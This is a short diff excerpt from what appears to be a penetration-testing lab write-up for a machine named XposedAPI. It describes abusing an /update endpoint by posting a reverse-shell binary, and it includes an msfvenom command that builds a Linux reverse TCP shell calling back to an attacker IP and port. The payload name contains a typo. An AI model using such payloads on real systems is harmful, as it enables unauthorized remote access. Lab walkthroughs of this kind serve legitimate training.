1Gould/Proving-Grounds/XposedAPI.md

 ```

-- Our vector is clear, use the /update endpoint and post a binary file with our reverse shell hosted on the url.
+- Our vector is seems clear, use the /update endpoint and post a binary file with our reverse shell hosted on the url.

 ```shell
 msfvenom -p linux/x84/shell_reverse_tcp LHOST=192.168.45.215 LPORT=4444 -f elf > shell.elf